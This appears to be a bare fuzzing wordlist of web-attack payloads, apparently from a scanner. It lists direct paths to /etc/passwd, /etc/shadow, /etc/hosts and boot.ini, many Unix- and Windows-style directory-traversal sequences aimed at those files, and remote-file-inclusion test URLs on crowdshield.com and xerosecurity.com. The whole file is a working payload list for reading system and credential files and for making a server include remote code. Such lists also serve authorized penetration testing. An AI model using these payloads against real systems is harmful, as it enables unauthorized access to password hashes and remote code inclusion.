/etc/passwd
/etc/shadow
/etc/hosts
/boot.ini
C:\boot.ini
https://crowdshield.com/.testing/rfi_vuln.php
//xerosecurity.com/.testing/rfi_vuln.php
http://xerosecurity.com/.testing/rfi_vuln.php
/../../../../../../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../../../../../../../../../etc/hosts
/../../../../../../../../../../../../../../../../../../boot.ini
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\hosts
\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
/..........................................................................\..\..\..\..\..\..\..\boot.ini
/..........................................................................\..\..\..\..\..\..\..\etc/passwd
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/passwd
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/shadow
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc/hosts
/
/../
/../../
/../../../
/../../../../
/../../../../../
/../../../../../../
/../../../../../../../
/../../../../../../../../
/../../../../../../../../../
/../../../../../../../../../../
/../../../../../../../../../../../
/../../../../../../../../../../../../
/../../../../../../../../../../../../../
\
\..\
\..\..\
\..\..\..\
\..\..\..\..\
\..\..\..\..\..\
\..\..\..\..\..\..\
\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\..\..\
\..\..\..\..\..\..\..\..\..\..\..\..\..\
